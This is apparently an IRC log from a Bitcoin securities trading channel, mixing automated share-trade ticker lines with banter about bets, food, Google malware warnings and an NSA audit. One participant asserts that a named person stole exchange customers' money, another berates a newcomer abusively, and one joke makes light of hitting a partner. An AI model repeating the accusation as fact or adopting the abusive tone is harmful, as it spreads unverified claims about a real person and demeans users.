0.15 = 1.35 BTC Aug 16 15:12:03 [BTCTC] [DMS.MINING] 8 @ 0.0034 = 0.0272 BTC [+] Aug 16 15:13:09 [BTCTC] [ACTIVEMINING] 250 @ 0.005312 = 1.328 BTC [-] Aug 16 15:14:19 [HAVELOCK] [SDSTM] 5 @ 0.0060001 = 0.03 BTC [+] Aug 16 15:16:30 [BTCTC] [DMS.MINING] 4 @ 0.003399 = 0.0136 BTC [-] Aug 16 15:16:53 [HAVELOCK] [LABCO] 1500 @ 0.00165 = 2.475 BTC [-] Aug 16 15:17:53 [HAVELOCK] [SDSTM] 69 @ 0.0060001 = 0.414 BTC [+] Aug 16 15:17:56 [HAVELOCK] [SDSTM] 73 @ 0.006 = 0.438 BTC [-] Aug 16 15:18:13 [MPEX] [S.MPOE] 4350 @ 0.00083523 = 3.6333 BTC [-] Aug 16 15:19:41 [BTCTC] [TAT.ASICMINER] 38 @ 0.03862 = 1.4676 BTC [-] Aug 16 15:21:41 [BTCTC] [TAT.ASICMINER] 8 @ 0.03864 = 0.3091 BTC [+] Aug 16 15:21:42 [BTCTC] [TAT.ASICMINER] 11 @ 0.03863 = 0.4249 BTC [-] Aug 16 15:21:44 [BTCTC] [TAT.ASICMINER] 50 @ 0.03859 = 1.9295 BTC [-] Aug 16 15:24:16 [BTCTC] [DMS.MINING] 16 @ 0.003399 = 0.0544 BTC [-] Aug 16 15:24:17 [BTCTC] [DMS.MINING] 13 @ 0.003399 = 0.0442 BTC [-] Aug 16 15:24:18 [BTCTC] [DMS.MINING] 265 @ 0.0034 = 0.901 BTC [+] Aug 16 15:24:18 [BTCTC] [DMS.MINING] 1 @ 0.0034 BTC [+] Aug 16 15:26:15 [BTCTC] [DMS.MINING] 10 @ 0.003567 = 0.0357 BTC [+] Aug 16 15:26:17 [BTCTC] [DMS.MINING] 100 @ 0.00357 = 0.357 BTC [+] Aug 16 15:26:18 [BTCTC] [DMS.MINING] 290 @ 0.003588 = 1.0405 BTC [+] Aug 16 15:26:24 [BTCTC] [LABCOIN] 30 @ 0.001627 = 0.0488 BTC [-] Aug 16 15:26:26 [BTCTC] [LABCOIN] 11 @ 0.001626 = 0.0179 BTC [-] Aug 16 15:27:07 [BTCTC] [ASICMINER-PT] 7 @ 3.9 = 27.3 BTC [-] Aug 16 15:27:51 [BTCTC] [ASICMINER-PT] 9 @ 3.88 = 34.92 BTC [-] Aug 16 15:27:52 [BTCTC] [LABCOIN] 85 @ 0.001622 = 0.1379 BTC [-] Aug 16 15:27:55 [BTCTC] [LABCOIN] 38 @ 0.00162 = 0.0616 BTC [-] Aug 16 15:35:02 [HAVELOCK] [XBOND] 100 @ 0.0010696 = 0.107 BTC [+] Aug 16 15:41:41 [BTCTC] [ACTIVEMINING] 189 @ 0.005313 = 1.0042 BTC [+] Aug 16 15:48:23 [BTCTC] [LABCOIN] 85 @ 0.001657 = 0.1408 BTC [+] Aug 16 15:48:24 [BTCTC] [LABCOIN] 62 @ 0.001669 = 0.1035 BTC [+] Aug 16 15:48:31 [BTCTC] [LABCOIN] 80 @ 0.00167 = 0.1336 BTC [+] Aug 16 15:48:55 [HAVELOCK] [XBOND] 1 @ 0.0010657 BTC [-] Aug 16 15:50:46 [BTCTC] [LABCOIN] 20 @ 0.001665 = 0.0333 BTC [-] Aug 16 15:51:01 [HAVELOCK] [AM100] 10 @ 0.03851001 = 0.3851 BTC [-] Aug 16 15:51:03 [HAVELOCK] [AM100] 5 @ 0.03851 = 0.1926 BTC [-] Aug 16 15:51:06 [HAVELOCK] [AM100] 235 @ 0.0385 = 9.0475 BTC [-] Aug 16 15:51:28 [HAVELOCK] [SMG] 50 @ 0.000181 = 0.0091 BTC [+] Aug 16 15:52:01 [BTCTC] [DMS.MINING] 51 @ 0.003579 = 0.1825 BTC [-] Aug 16 15:52:45 [HAVELOCK] [SMG] 34 @ 0.000181 = 0.0062 BTC [+] Aug 16 15:53:23 [BTCTC] [LABCOIN] 30 @ 0.001663 = 0.0499 BTC [-] Aug 16 16:05:14 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.001 = 0.002 BTC [-] Aug 16 16:05:38 [HAVELOCK] [HIM] 6 @ 0.2001 = 1.2006 BTC [+] Aug 16 16:06:15 [BTCTC] [TAT.ASICMINER] 2 @ 0.039 = 0.078 BTC [+] Aug 16 16:08:05 [BTCTC] [DMS.SELLING] 3 @ 0.01761 = 0.0528 BTC [-] Aug 16 16:08:07 [BTCTC] [DMS.MINING] 3 @ 0.00341 = 0.0102 BTC [-] Aug 16 16:08:09 [BTCTC] [DMS.PURCHASE] 3 @ 0.0208 = 0.0624 BTC [+] Aug 16 16:08:50 [BTCTC] [DMS.SELLING] 2 @ 0.01761 = 0.0352 BTC [-] Aug 16 16:08:58 [BTCTC] [DMS.PURCHASE] 2 @ 0.0208 = 0.0416 BTC [+] Aug 16 16:09:20 [BTCTC] [DMS.MINING] 9 @ 0.0033 = 0.0297 BTC [-] Aug 16 16:09:40 [BTCTC] [DMS.SELLING] 4 @ 0.0176 = 0.0704 BTC [-] Aug 16 16:09:52 [BTCTC] [DMS.PURCHASE] 4 @ 0.0208 = 0.0832 BTC [+] Aug 16 16:10:02 [BTCTC] [DMS.MINING] 4 @ 0.0033 = 0.0132 BTC [-] Aug 16 16:10:33 [BTCTC] [DMS.SELLING] 10 @ 0.0176 = 0.176 BTC [-] Aug 16 16:10:46 [BTCTC] [DMS.PURCHASE] 16 @ 0.0208 = 0.3328 BTC [+] Aug 16 16:11:08 [BTCTC] [DMS.MINING] 2 @ 0.00339 = 0.0068 BTC [+] Aug 16 16:11:08 [BTCTC] [DMS.MINING] 4 @ 0.00339 = 0.0136 BTC [+] Aug 16 16:11:10 [BTCTC] [DMS.MINING] 10 @ 0.00339 = 0.0339 BTC [+] Aug 16 16:11:11 [BTCTC] [DMS.MINING] 9 @ 0.003488 = 0.0314 BTC [+] Aug 16 16:11:12 [BTCTC] [DMS.MINING] 44 @ 0.00359 = 0.158 BTC [+] Aug 16 16:11:13 [BTCTC] [DMS.MINING] 1 @ 0.003599 BTC [+] Aug 16 16:11:14 [BTCTC] [DMS.MINING] 730 @ 0.0036 = 2.628 BTC [+] Aug 16 16:12:15 who wants to write a bbet https://bitcointalk.org/index.php?topic=5441.msg2945022#msg2945022 Aug 16 16:14:47 [BTCTC] [TAT.ASICMINER] 1 @ 0.03842 BTC [-] Aug 16 16:14:48 [BTCTC] [TAT.ASICMINER] 1 @ 0.0384 BTC [-] Aug 16 16:15:06 kakobrekla who the hell is putting 100 btc on yes Aug 16 16:15:37 So if they win... do they get paid? lol Aug 16 16:16:06 whoever wins gets paid yeah Aug 16 16:17:03 If the site fails? Aug 16 16:17:11 well, they seem crazy enough Aug 16 16:18:02 hm Aug 16 16:18:04 which reminds me Aug 16 16:18:13 where is zhoutong Aug 16 16:18:20 isnt he working on some new shit Aug 16 16:19:11 [HAVELOCK] [XBOND] 648 @ 0.0010552 = 0.6838 BTC [-] Aug 16 16:19:26 [HAVELOCK] [XBOND] 952 @ 0.00105 = 0.9996 BTC [-] Aug 16 16:19:36 kakobrekla it didn't take off. much like jared kenna's new shit didn't take off. Aug 16 16:19:40 i wonder why that would be. Aug 16 16:20:11 [HAVELOCK] [XBOND] 2228 @ 0.00105 = 2.3394 BTC [-] Aug 16 16:20:22 [BTCTC] [ASICMINER-PT] 1 @ 3.863 BTC [-] Aug 16 16:20:25 [BTCTC] [DMS.PURCHASE] 2500 @ 0.0208 = 52 BTC [+] Aug 16 16:21:12 [BTCTC] [DMS.MINING] 40 @ 0.003341 = 0.1336 BTC [-] Aug 16 16:21:27 [HAVELOCK] [XBOND] 10 @ 0.00105 = 0.0105 BTC [-] Aug 16 16:29:43 [BTCTC] [BASIC-MINING] 1 @ 0.3189 BTC [+] Aug 16 16:29:44 [BTCTC] [BASIC-MINING] 3 @ 0.3189 = 0.9567 BTC [+] Aug 16 16:29:45 [BTCTC] [BASIC-MINING] 2 @ 0.319 = 0.638 BTC [+] Aug 16 16:34:47 [HAVELOCK] [SDSTM] 5 @ 0.00624 = 0.0312 BTC [+] Aug 16 16:35:16 [HAVELOCK] [SDSTM] 20 @ 0.0062499 = 0.125 BTC [+] Aug 16 16:35:53 [HAVELOCK] [AM100] 5 @ 0.0388 = 0.194 BTC [+] Aug 16 16:36:09 [BTCTC] [DMS.PURCHASE] 1444 @ 0.0208 = 30.0352 BTC [+] Aug 16 16:40:01 [BTCTC] [TAT.VIRTUALMINE] 19 @ 0.001 = 0.019 BTC [-] Aug 16 16:40:40 [BTCTC] [LABCOIN] 30 @ 0.001642 = 0.0493 BTC [-] Aug 16 16:40:46 http://imgur.com/gallery/D5GXc3e Aug 16 16:40:47 I run a produce department as well, should I get a promotion? (OC) - Imgur Aug 16 16:40:51 I imagine this is what europe looks like Aug 16 16:42:09 Shit .59 for a bell pepper isn't bad Aug 16 16:42:47 [BTCTC] [LABCOIN] 6 @ 0.001641 = 0.0098 BTC [-] Aug 16 16:43:40 [BTCTC] [COG.F] 1 @ 4.01 BTC [+] Aug 16 16:44:28 [BTCTC] [LABCOIN] 6 @ 0.001641 = 0.0098 BTC [-] Aug 16 16:45:41 [BTCTC] [BTC-GROWTH] 40 @ 0.1 = 4 BTC [+] Aug 16 16:46:19 [BTCTC] [LABCOIN] 6 @ 0.001641 = 0.0098 BTC [-] Aug 16 16:47:00 wut Aug 16 16:47:46 url= Aug 16 16:47:48 ? Aug 16 16:47:54 Links. ALWAYS links. Aug 16 16:47:59 :) Aug 16 16:48:19 Diablo-D3:let me get my juicer Aug 16 16:48:25 [BTCTC] [LABCOIN] 6 @ 0.001641 = 0.0098 BTC [-] Aug 16 16:48:40 [BTCTC] [DMS.MINING] 6 @ 0.003122 = 0.0187 BTC [-] Aug 16 16:48:41 [BTCTC] [DMS.MINING] 10 @ 0.003132 = 0.0313 BTC [+] Aug 16 16:48:43 [BTCTC] [DMS.MINING] 34 @ 0.003132 = 0.1065 BTC [+] Aug 16 16:48:44 [BTCTC] [DMS.MINING] 10 @ 0.00329 = 0.0329 BTC [+] Aug 16 16:49:59 haha saw that Aug 16 16:50:21 [BTCTC] [LABCOIN] 6 @ 0.001641 = 0.0098 BTC [-] Aug 16 16:50:28 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.001118 BTC [+] Aug 16 16:50:29 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.001152 = 0.0023 BTC [+] Aug 16 16:50:30 [BTCTC] [TAT.VIRTUALMINE] 6 @ 0.00116 = 0.007 BTC [+] Aug 16 16:50:40 http://www.justmugshots.com/texas/collin-county/18816833 Aug 16 16:50:42 Trendon T Shavers's Mugshot - Collin County, TX. (Arrested 2013-08-11) Aug 16 16:50:56 Diablo-D3: all the comments are people saying "dummy, the veg on the bottom will rot" Aug 16 16:50:56 heh Aug 16 16:51:26 nubbins`: depends on the volume Aug 16 16:51:31 there are places that thats really a day supply Aug 16 16:51:35 or less Aug 16 16:51:47 pirate gets arrested for beating women, Mircea gets paid for it Aug 16 16:52:22 banana peppers are about .3 cents a pound here Aug 16 16:52:53 wow TomServo, that's juicy. Aug 16 16:52:58 thats half an hours supply the day I got my jiucer Aug 16 16:53:24 I juiced errythang Aug 16 16:53:25 you still use it? Aug 16 16:53:31 so basically, "stress causing family violence in domestic animals" Aug 16 16:53:44 yeap Aug 16 16:53:46 kakobrekla no, he juiced his ballsac accidentally and gave up the juicin Aug 16 16:54:26 well i thought it was the thing that went out of fashion Aug 16 16:54:34 I've been using my dehydrator a lot lately Aug 16 16:54:54 im holding out for when they invent the fartifier. Aug 16 16:54:57 dunno i just eat the fruit Aug 16 16:54:57 load up whenever orange bell peppers are on sale and preserve those fuckers Aug 16 16:55:07 [BTCTC] [DMS.MINING] 7 @ 0.003289 = 0.023 BTC [-] Aug 16 16:55:18 mp is that the appliance that makes things smell like farts? Aug 16 16:55:34 [HAVELOCK] [XBOND] 3 @ 0.0010657 = 0.0032 BTC [+] Aug 16 16:55:35 well they have one making them liquid, they got one taking the liquid out Aug 16 16:55:35 i see you are in a good mood today mircea_popescu Aug 16 16:55:36 [BTCTC] [DMS.SELLING] 1 @ 0.01799 BTC [+] Aug 16 16:55:42 i expect one putting gases in isnt far behind Aug 16 16:55:42 farts and ballsacks Aug 16 16:56:01 kakobrekla don't discriminate against my kind of humour Aug 16 16:56:03 you raceist. Aug 16 16:56:07 [BTCTC] [DMS.MINING] 250 @ 0.00329 = 0.8225 BTC [+] Aug 16 16:56:15 http://www.ronsonwriter.com/content/view/69/9 like dis? Aug 16 16:56:20 The Ronson Writer - Husband Convicted Of Manslaughter After Dutch Oven Goes Wrong Aug 16 16:56:22 is all good Aug 16 16:56:34 haha Aug 16 16:56:36 dub: that is freaking hilarious Aug 16 16:56:43 lmao Aug 16 16:56:50 i accidentally punched my gf in the face while trying to dutch oven her Aug 16 16:56:52 felt bad man Aug 16 16:56:58 [BTCTC] [DMS.MINING] 8 @ 0.00329 = 0.0263 BTC [+] Aug 16 16:56:59 she loved it Aug 16 16:57:02 The amount of detail in the article is great. Aug 16 16:57:10 [HAVELOCK] [XBOND] 27 @ 0.0010657 = 0.0288 BTC [+] Aug 16 16:57:19 [BTCTC] [BTC-GROWTH] 75 @ 0.0992 = 7.44 BTC [-] Aug 16 16:57:21 [BTCTC] [BTC-GROWTH] 19 @ 0.0991 = 1.8829 BTC [-] Aug 16 16:57:22 [BTCTC] [BTC-GROWTH] 3 @ 0.0991 = 0.2973 BTC [-] Aug 16 16:57:24 [BTCTC] [BTC-GROWTH] 100 @ 0.099 = 9.9 BTC [-] Aug 16 16:57:37 is this like the dutch onion blog ? Aug 16 16:57:45 looks like it Aug 16 16:57:51 "man ate all the pies" Aug 16 16:58:17 sounds like a lethal recipie Aug 16 16:58:34 The first being Mrs Flannery's military tucking in of the 600 weight cotton sheets when she made the bed that morning, which created a near airtight seal . Aug 16 16:58:34 in the hope that you will be an example to other husbands and boyfriends across the UK, and a ray of light to their long suffering wives and girlfriend Aug 16 16:58:37 guiness farts alone are no joke Aug 16 16:59:15 i've never had enough gas to try that shit. Aug 16 16:59:17 farts are always a joke Aug 16 16:59:23 i guess i'm impotent, in a manner of speaking. Aug 16 16:59:27 it's just a matter of whether you're trapped in the blast zone Aug 16 16:59:44 mp, eat lots of beef and cheese Aug 16 16:59:46 cabbage too Aug 16 16:59:59 in other news, http://trilema.com/2013/eulora-august-update/ Aug 16 17:00:00 [HAVELOCK] [XBOND] [PAID] 1.00978800 BTC to 2`019`576 shares, 50 satoshi per share Aug 16 17:00:13 here's a two week announcement. all sorts of juicy stuff including an easter egg hunt Aug 16 17:00:21 make hummus without peeling the chickpeas Aug 16 17:00:35 [HAVELOCK] [XBOND] 1 @ 0.0010657 BTC [+] Aug 16 17:01:38 sweet Aug 16 17:01:57 davout ^ source. Aug 16 17:02:05 [BTCTC] [TAT.ASICMINER] 3 @ 0.03822 = 0.1147 BTC [-] Aug 16 17:02:07 [BTCTC] [TAT.ASICMINER] 6 @ 0.03822 = 0.2293 BTC [-] Aug 16 17:02:10 [HAVELOCK] [XBOND] 3 @ 0.0010657 = 0.0032 BTC [+] Aug 16 17:02:23 mircea_popescu: artist is a bit behind on those heraldics because i took her ass out west and married her, but things are coming along Aug 16 17:02:38 is she now ms nubbins ? Aug 16 17:03:04 [HAVELOCK] [XBOND] 2 @ 0.0010657 = 0.0021 BTC [+] Aug 16 17:03:15 [HAVELOCK] [LABCO] 1 @ 0.00177 BTC [+] Aug 16 17:03:47 [BTCTC] [DMS.MINING] 104 @ 0.00329 = 0.3422 BTC [+] Aug 16 17:05:07 she kept her last name, it's not the 50s ;p Aug 16 17:05:21 [HAVELOCK] [XBOND] 1 @ 0.0010657 BTC [+] Aug 16 17:05:24 [HAVELOCK] [AM100] 4 @ 0.03889 = 0.1556 BTC [+] Aug 16 17:05:45 besides, her first name and my last name sound weird together Aug 16 17:07:10 What is the max daily withdraw limit on TradeHill Aug 16 17:07:13 Anyone know? Aug 16 17:07:17 From BTC to USD. Aug 16 17:08:00 [BTCTC] [ACTIVEMINING] 2 @ 0.0054 = 0.0108 BTC [+] Aug 16 17:09:31 kleeck zero, basically. Aug 16 17:09:48 mircea_popescu, explain... Aug 16 17:11:22 kleeck jared kenna had an exchange. he ran off with everyone's money under the guise of dwolla stealing it. Aug 16 17:11:38 he came back a year later, in the hopes of paying off a tiny fraction and doing it all over again. Aug 16 17:11:49 people with any sense are staying away from it. Aug 16 17:12:16 So, you don't actually know how much BTC to USD one can convert via a prime account on the exchange? Aug 16 17:12:21 [HAVELOCK] [XBOND] 1 @ 0.0010657 BTC [+] Aug 16 17:12:39 how much btc can you convert to usd via yetanotherrandomscam.com ? Aug 16 17:12:42 zerrrrro! Aug 16 17:13:30 You could have just remained silent or said, "I don't know". Thanks anways... Aug 16 17:13:43 how much of your btc can tradehill convert to their usd? Aug 16 17:13:44 no, i could not have. and it's not a case of "i don't know". Aug 16 17:14:01 you, however, could have shut the fuck up rather than having to do another rendion of "i was being funny" later. Aug 16 17:14:59 [HAVELOCK] [AM100] 4 @ 0.0388 = 0.1552 BTC [-] Aug 16 17:15:21 mircea_popescu, so much anger. Keep calm and carry on. :) Aug 16 17:15:50 why is it that every time someone does something stupid online the next thing out of their mouth is unqualified psychologizing ? Aug 16 17:15:55 [BTCTC] [DMS.MINING] 526 @ 0.00329 = 1.7305 BTC [+] Aug 16 17:16:04 how hard is it to just say "i've been stupid sorry, i'll think more before opining next time" Aug 16 17:16:25 mircea_popescu, good question... Now connect the dots... :D Aug 16 17:16:56 sigh. apparently it's also incurable. Aug 16 17:17:06 [BTCTC] [LABCOIN] 1 @ 0.001658 BTC [+] Aug 16 17:17:38 No way! Double irony?! This is too much. Aug 16 17:18:17 do you have any idea how many idiots before you have played this same exact "i am smart on irc" game ? Aug 16 17:19:05 http://orlingrabbe.com/wp-content/uploads/2013/06/wpid-fde.dll_.jpg Aug 16 17:19:34 heh Aug 16 17:19:35 mircea_popescu, I'm really sorry. I simply do not have time for the ensuing conversation. I'm sure it would have been thrilling. Thanks again for at least attempting an answer to my question. Cheers! Aug 16 17:19:37 no kidding Aug 16 17:19:58 eagerly awaiting the next pompous idiocy you don't have time for the consequences of. Aug 16 17:20:26 fucking blessing of herp. "o, let's get people involved in bitcoin". right. Aug 16 17:20:27 [HAVELOCK] [AM100] 5 @ 0.03851 = 0.1926 BTC [-] Aug 16 17:20:29 [HAVELOCK] [AM100] 25 @ 0.0385 = 0.9625 BTC [-] Aug 16 17:21:33 [BTCTC] [BTC-GROWTH] 100 @ 0.09999 = 9.999 BTC [+] Aug 16 17:23:09 those CFIG shares are still flying off the shelves Aug 16 17:23:34 they sold like 100 since Wednesday! Aug 16 17:24:10 [BTCTC] [BTC-GROWTH] 4 @ 0.1 = 0.4 BTC [+] Aug 16 17:26:20 "raise awareness" Aug 16 17:28:33 [BTCTC] [ACTIVEMINING] 30 @ 0.0053 = 0.159 BTC [-] Aug 16 17:28:36 [BTCTC] [ACTIVEMINING] 10 @ 0.005299 = 0.053 BTC [-] Aug 16 17:28:37 [BTCTC] [ACTIVEMINING] 50 @ 0.005281 = 0.2641 BTC [-] Aug 16 17:28:55 is 100 a lot ? Aug 16 17:32:07 [BTCTC] [DMS.SELLING] 16 @ 0.01799 = 0.2878 BTC [+] Aug 16 17:34:32 [BTCTC] [BASIC-MINING] 1 @ 0.319 BTC [+] Aug 16 17:34:34 [BTCTC] [BASIC-MINING] 2 @ 0.3197 = 0.6394 BTC [+] Aug 16 17:44:05 [BTCTC] [TAT.ASICMINER] 8 @ 0.03868 = 0.3094 BTC [+] Aug 16 17:44:07 [BTCTC] [TAT.ASICMINER] 32 @ 0.03869 = 1.2381 BTC [+] Aug 16 17:46:20 MP: No more MPEX1 twitter feed? logged in for the first time in awhile and it seems gone. Aug 16 17:48:02 ColdHardMetal still wrangling with twitter over it. Aug 16 17:48:20 [BTCTC] [ACTIVEMINING] 500 @ 0.005275 = 2.6375 BTC [-] Aug 16 17:48:43 fair enough. Aug 16 17:48:50 meanwhile there's rss directly from the site or you can get a feed from assbot Aug 16 17:48:59 if you're using it for some application or w/e Aug 16 17:49:24 no, not using it for anyhting other than watching. Aug 16 17:50:22 100 is nothing Aug 16 17:50:24 a ok Aug 16 17:50:25 100 is 15 BTC Aug 16 17:50:47 they were planning to release 4 tranches of 50000 shares Aug 16 17:51:06 they've so far sold… 3,411 shares Aug 16 17:52:16 thankfully the idiotpond is drying up ? Aug 16 17:52:40 [HAVELOCK] [XBOND] 9 @ 0.0010646 = 0.0096 BTC [-] Aug 16 17:53:39 http://bitbet.us/bet/476/btc-network-difficulty-tops-52-million-by-end/ Aug 16 17:53:44 BitBet - BTC network difficulty tops 52 million by end of August Aug 16 17:53:47 if for whatever reason that comes out as a no... Aug 16 17:55:16 [BTCTC] [TAT.ASICMINER] 10 @ 0.03867 = 0.3867 BTC [-] Aug 16 17:55:17 [BTCTC] [TAT.ASICMINER] 15 @ 0.03868 = 0.5802 BTC [+] Aug 16 17:55:41 [BTCTC] [ACTIVEMINING] 500 @ 0.00575 = 2.875 BTC [+] Aug 16 17:56:07 [BTCTC] [LABCOIN] 25 @ 0.001654 = 0.0414 BTC [-] Aug 16 17:59:16 how long do you think before someone sues Google for these "This site may be compromised" warnings Aug 16 17:59:20 [HAVELOCK] [XBOND] 1 @ 0.0010657 BTC [+] Aug 16 17:59:51 ThickAsThieves: I considered it Aug 16 18:00:01 [BTCTC] [BTC-GROWTH] 4 @ 0.09999 = 0.4 BTC [-] Aug 16 18:00:04 not much standing really Aug 16 18:00:13 they kept claiming this on one of my sites that clearly had no malware Aug 16 18:00:38 [BTCTC] [BTC-GROWTH] 28 @ 0.1 = 2.8 BTC [+] Aug 16 18:00:48 "may be" is a pretty open-ended statement Aug 16 18:01:03 "The owner of this site may be a rapist" Aug 16 18:01:10 I mean, who's to say otherwise? Aug 16 18:02:00 i think there's plenty standing Aug 16 18:02:08 i hate red Aug 16 18:02:11 let's sue Aug 16 18:02:15 i mean as a user a like that google is doing it Aug 16 18:02:40 if they lose this then anyone posting any sort of warning anywhere is in a pickle. Aug 16 18:02:58 such as, did you say "we're not responsible for what content users post" ? you mean to say user content sucks ? fuck you. Aug 16 18:03:47 "Don't feed the animals, they may bite? Fuck 'em, we're eating polar bear cub for dinner" Aug 16 18:03:58 lolwut? Aug 16 18:04:18 @ the zoo Aug 16 18:04:35 [BTCTC] [BTC-GOLD] 20 @ 0.00699 = 0.1398 BTC [+] Aug 16 18:04:45 sorry, i go on tangents sometimes Aug 16 18:04:54 well stop eating bear cubs! Aug 16 18:05:38 [HAVELOCK] [AM100] 2 @ 0.0377 = 0.0754 BTC [-] Aug 16 18:05:41 [HAVELOCK] [AM100] 1 @ 0.03761003 BTC [-] Aug 16 18:05:43 [HAVELOCK] [AM100] 3 @ 0.03761002 = 0.1128 BTC [-] Aug 16 18:05:45 [HAVELOCK] [AM100] 1 @ 0.03761001 BTC [-] Aug 16 18:05:47 [HAVELOCK] [AM100] 1 @ 0.0376 BTC [-] Aug 16 18:05:50 [HAVELOCK] [AM100] 5 @ 0.0376 = 0.188 BTC [-] Aug 16 18:05:52 [HAVELOCK] [AM100] 10 @ 0.03751001 = 0.3751 BTC [-] Aug 16 18:05:54 [HAVELOCK] [AM100] 15 @ 0.03751 = 0.5627 BTC [-] Aug 16 18:05:56 [HAVELOCK] [AM100] 12 @ 0.03751 = 0.4501 BTC [-] Aug 16 18:05:58 [HAVELOCK] [AM100] 273 @ 0.03750001 = 10.2375 BTC [-] Aug 16 18:06:00 [HAVELOCK] [AM100] 5 @ 0.0375 = 0.1875 BTC [-] Aug 16 18:06:02 [HAVELOCK] [AM100] 1 @ 0.03740001 BTC [-] Aug 16 18:06:04 [HAVELOCK] [AM100] 10 @ 0.03733 = 0.3733 BTC [-] Aug 16 18:06:06 [HAVELOCK] [AM100] 200 @ 0.037329 = 7.4658 BTC [-] Aug 16 18:06:07 [HAVELOCK] [AM100] 70 @ 0.0372 = 2.604 BTC [-] Aug 16 18:06:09 [HAVELOCK] [AM100] 90 @ 0.0372 = 3.348 BTC [-] Aug 16 18:06:11 [HAVELOCK] [AM100] 1 @ 0.0371 BTC [-] Aug 16 18:06:28 i'm trying to think of an analogy Aug 16 18:06:32 maybe like, Aug 16 18:06:52 warnings that offend Aug 16 18:06:53 if frommers guide says "this museum may display forgeries" Aug 16 18:07:01 it's like a jeopardy category Aug 16 18:07:44 "this restaurant may try to overcharge you" Aug 16 18:08:08 [BTCTC] [LABCOIN] 2 @ 0.001639 = 0.0033 BTC [-] Aug 16 18:08:09 [BTCTC] [LABCOIN] 5 @ 0.00164 = 0.0082 BTC [+] Aug 16 18:08:19 and then humanity devolves into a sludge of "may"s and "could"s Aug 16 18:08:38 another issue is that many of these compromised sites are not dangerous to users Aug 16 18:08:42 [BTCTC] [TAT.ASICMINER] 3 @ 0.03875 = 0.1163 BTC [+] Aug 16 18:08:43 [BTCTC] [TAT.ASICMINER] 34 @ 0.03875 = 1.3175 BTC [+] Aug 16 18:08:45 they just have hidden spam links Aug 16 18:08:45 this water could be used to drown an infant. are you sure you still want to drink it? Aug 16 18:09:04 in general courts have found in favour of warnings tho. Aug 16 18:09:05 [BTCTC] [TAT.ASICMINER] 3 @ 0.03875 = 0.1163 BTC [+] Aug 16 18:09:20 it becomes a humongous issue of free speech too, what if you think x is a fraud ? you're not allowed to say so ? Aug 16 18:09:35 not a laywer... Aug 16 18:09:42 i think some azn countries are like that, you're not allowed to say a restaurant fed you rat soup even if they actually did Aug 16 18:09:43 google is curating info Aug 16 18:09:47 cause "it may ruin their business" Aug 16 18:09:49 and an authority Aug 16 18:10:11 well, curating to an extent Aug 16 18:10:29 would you haul them into court over a headline they reposted on google news? Aug 16 18:10:30 they are distinquishing the compromised from the not at least... Aug 16 18:10:41 g Aug 16 18:10:50 true Aug 16 18:11:04 guess it depends on how automated it is Aug 16 18:11:09 [BTCTC] [BASIC-MINING] 1 @ 0.3141 BTC [-] Aug 16 18:11:10 maybe someone will sue them for NOT warning them Aug 16 18:11:18 like, hasn't the issue of search rankings been brought before courts in the past? Aug 16 18:12:14 http://www.theregister.co.uk/2013/08/16/nsa_internal_audit_privacy_violations/ Aug 16 18:12:25 Area 51 exists! Aug 16 18:12:31 nubbins` number of times Aug 16 18:12:32 [HAVELOCK] [AM100] 5 @ 0.0384 = 0.192 BTC [+] Aug 16 18:13:08 "and even typos." Aug 16 18:13:15 anyone here saw Brazil ? Aug 16 18:13:17 right. so, if it's an actual human saying "ok this site gets the red warning, this one doesn't", that's a bit more precarious than an algorithm doing it Aug 16 18:13:31 mircea_popescu: Yeah, but quite a while ago Aug 16 18:13:42 tuttle! Aug 16 18:13:48 [HAVELOCK] [AM100] 5 @ 0.0384 = 0.192 BTC [+] Aug 16 18:13:55 typos! remember when compaq had that little device called the ipaq? Aug 16 18:13:55 "some involved violations of a court order - such as a February 2012 incident involving the unauthorised retention of 3,000 files that a surveillance court had ordered the NSA to destroy." Aug 16 18:14:08 herpderp, we ignore court orders, but expect everyone else to follow them Aug 16 18:14:15 NSA issues a press release that was supposed to say "ipaq bombs" after its dismal sales Aug 16 18:14:20 gets typo'd to "bomb iraq" Aug 16 18:14:23 rest is history Aug 16 18:15:20 with just a tiny footnote wondering why NSA was reporting on tech news in the first place Aug 16 18:15:24 [HAVELOCK] [AM100] 3 @ 0.0384 = 0.1152 BTC [+] Aug 16 18:15:54 [HAVELOCK] [XBOND] 8 @ 0.0010657 = 0.0085 BTC [+] Aug 16 18:16:01 [BTCTC] [LABCOIN] 30 @ 0.001666 = 0.05 BTC [+] Aug 16 18:16:03 [BTCTC] [LABCOIN] 1 @ 0.001667 BTC [+] Aug 16 18:16:04 [BTCTC] [LABCOIN] 57 @ 0.001669 = 0.0951 BTC [+] Aug 16 18:16:27 [BTCTC] [LABCOIN] 1 @ 0.001665 BTC [-] Aug 16 18:16:37 [BTCTC] [LABCOIN] 29 @ 0.001666 = 0.0483 BTC [+] Aug 16 18:16:50 [BTCTC] [BASIC-MINING] 9 @ 0.3001 = 2.7009 BTC [-] Aug 16 18:17:50 [BTCTC] [DMS.MINING] 15 @ 0.00349 = 0.0524 BTC [+] Aug 16 18:17:59 [BTCTC] [LABCOIN] 30 @ 0.001669 = 0.0501 BTC [+] Aug 16 18:18:00 [BTCTC] [BTC-GROWTH] 5 @ 0.1 = 0.5 BTC [+] Aug 16 18:18:16 [BTCTC] [LABCOIN] 6 @ 0.001667 = 0.01 BTC [-] Aug 16 18:18:34 [BTCTC] [LABCOIN] 57 @ 0.001668 = 0.0951 BTC [+] Aug 16 18:18:35 [BTCTC] [LABCOIN] 20 @ 0.001668 = 0.0334 BTC [+] Aug 16 18:19:34 [BTCTC] [DMS.MINING] 50 @ 0.00349 = 0.1745 BTC [+] Aug 16 18:21:47 [HAVELOCK] [XBOND] 1 @ 0.0010657 BTC [+] Aug 16 18:23:05 [BTCTC] [BASIC-MINING] 4 @ 0.3001 = 1.2004 BTC [-] Aug 16 18:23:51 [BTCTC] [LABCOIN] 32 @ 0.001669 = 0.0534 BTC [+] Aug 16 18:24:21 https://bitcointalk.org/index.php?topic=274916.msg1521109;topicseen#new Aug 16 18:24:27 [Bitfunder] IPO - HomeRemodeling (Official Investor Forum) Aug 16 18:26:05 [BTCTC] [DMS.PURCHASE] 10 @ 0.0208 = 0.208 BTC [+] Aug 16 18:26:36 [BTCTC] [LABCOIN] 25 @ 0.001669 = 0.0417 BTC [+] Aug 16 18:28:14 eh Aug 16 18:28:15 [BTCTC] [ACTIVEMINING] 15 @ 0.00526 = 0.0789 BTC [-] Aug 16 18:28:16 [BTCTC] [ACTIVEMINING] 6 @ 